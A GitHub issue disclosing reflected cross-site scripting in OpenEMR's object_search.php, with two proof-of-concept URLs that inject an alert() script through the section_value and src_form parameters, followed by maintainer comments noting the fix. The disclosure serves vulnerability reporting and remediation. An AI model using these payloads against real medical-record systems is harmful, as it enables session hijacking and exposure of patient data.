Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

OpenEMR (lastest version)- Multiple Cross-Site Scripting (XSS) #498

Closed
bestshow opened this issue Feb 27, 2017 · 5 comments

Comments

@bestshow
Copy link

commented Feb 27, 2017

Product:OpenEMR
Download: https://github.com/openemr/openemr
Vunlerable Version: lastest version and probably prior
Tested Version: lastest version
Author: ADLab of Venustech

Advisory Details:
I have discovered multiple Cross-Site Scripting (XSS) in “OpenEMR”, which can be exploited to execute arbitrary code.
The vulnerability exists due to insufficient filtration of user-supplied data in multiple HTTP GET parameters passed to “openemr-master/gacl/admin/object_search.php” url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to see a pop-up messagebox:
Poc:
(1)
http://localhost/github1/zip/openemr_master/openemr-master/gacl/admin/object_search.php?section_value=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(2)
http://localhost/github1/zip/openemr_master/openemr-master/gacl/admin/object_search.php?src_form=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22

@bradymiller

This comment has been minimized.

Copy link
Member

commented Feb 28, 2017

The solution for this vulnerability is currently being worked on by a group researching tools to fix vulnerabilities.

@bestshow bestshow closed this May 31, 2017

@bradymiller

This comment has been minimized.

Copy link
Member

commented May 31, 2017

@bestshow ,
Just checking why this was closed?
thanks,
-brady

@bestshow

This comment has been minimized.

Copy link
Author

commented May 31, 2017

@bradymiller ,Sorry, I made a mistake, I`ll reopen it.

@bestshow bestshow reopened this May 31, 2017

@bradymiller

This comment has been minimized.

Copy link
Member

commented May 31, 2017

no prob (I commonly make this mistake also).

@bradymiller bradymiller added this to the 5.0.1 milestone Oct 26, 2017

@bradymiller

This comment has been minimized.

Copy link
Member

commented Jan 16, 2018

this was fixed via both:
#1388
6d8234d

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.